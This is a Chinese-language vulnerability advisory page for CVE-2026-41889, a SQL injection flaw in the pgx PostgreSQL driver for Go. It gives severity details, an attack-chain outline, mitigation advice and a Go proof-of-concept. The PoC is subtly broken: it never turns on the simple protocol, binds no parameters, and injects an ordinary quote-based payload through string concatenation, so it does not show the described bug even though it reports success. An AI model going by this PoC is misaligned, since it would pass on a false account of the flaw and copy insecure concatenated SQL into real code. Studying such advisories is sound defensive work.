CVE-2026-41889 CVSS 9.8 严重

CVE-2026-41889: pgx SQL注入漏洞

披露日期: 2026-05-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41889

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

pgx (PostgreSQL driver for Go)

漏洞概述

pgx是用于Go语言的PostgreSQL驱动及工具包。在5.9.2版本之前，当应用使用非默认的简单协议，并在SQL查询中使用了美元引用字符串字面量时，如果该字面量包含在字符串外部会被解释为占位符的文本，且该占位符的值可被攻击者控制，则可能发生SQL注入。攻击者可借此窃取或篡改数据库数据，该风险已在5.9.2版本中修复。

技术细节

该漏洞的根本原因在于pgx驱动在处理简单协议下的SQL语句解析时，未能正确区分美元引用字符串内部的占位符与实际参数绑定。在正常情况下，位于$$...$$之间的内容应被视为纯文本字面量。然而，在受影响版本中，如果启用了简单协议，驱动程序在解析SQL语句时，可能会错误地将字符串字面量内部的文本（如$1）识别为外部参数占位符。如果攻击者能够控制这部分输入，并配合构造特定的查询结构，即可导致原本的数据被当作SQL代码执行，从而绕过参数化查询的防护机制，实现远程SQL注入攻击。

攻击链分析

STEP 1

侦察

攻击者识别目标应用程序正在使用受影响版本的pgx驱动（< 5.9.2），并确认其配置使用了简单协议。

STEP 2

载荷构造

攻击者构造包含特殊占位符文本（如$1）的恶意输入，旨在破坏美元引用字符串字面量的解析逻辑。

STEP 3

注入执行

将恶意载荷发送至应用程序。由于解析漏洞，驱动程序错误地将字符串内部的文本解释为SQL命令或参数。

STEP 4

影响达成

数据库执行攻击者构造的SQL语句，导致敏感数据泄露、数据篡改或服务器被控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

package main

import (
	"context"
	"fmt"
	"github.com/jackc/pgx/v5"
)

func main() {
	// Vulnerable scenario: pgx < 5.9.2 using simple protocol
	connStr := "postgres://user:password@localhost/testdb"
	conn, err := pgx.Connect(context.Background(), connStr)
	if err != nil {
		panic(err)
	}
	defer conn.Close(context.Background())

	// User input containing placeholder-like syntax
	attackerInput := "admin' OR 1=1 -- $1"

	// Vulnerable query construction using dollar quoting
	// In simple protocol, the parser may mishandle the input inside $$
	query := fmt.Sprintf("SELECT * FROM users WHERE name = $$%s$$", attackerInput)

	// Execution
	rows, err := conn.Query(context.Background(), query)
	if err != nil {
		fmt.Println("Injection failed or error:", err)
	} else {
		fmt.Println("Potential SQL Injection successful")
		rows.Close()
	}
}

影响范围

pgx < 5.9.2

防御指南

临时缓解措施

建议立即将pgx依赖库升级至5.9.2或更高版本以彻底修复此漏洞。如果短期内无法升级，请尽量避免使用Simple Protocol，并在代码层面确保不将未经过滤的用户输入直接拼接到包含美元引用字符串的SQL语句中。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表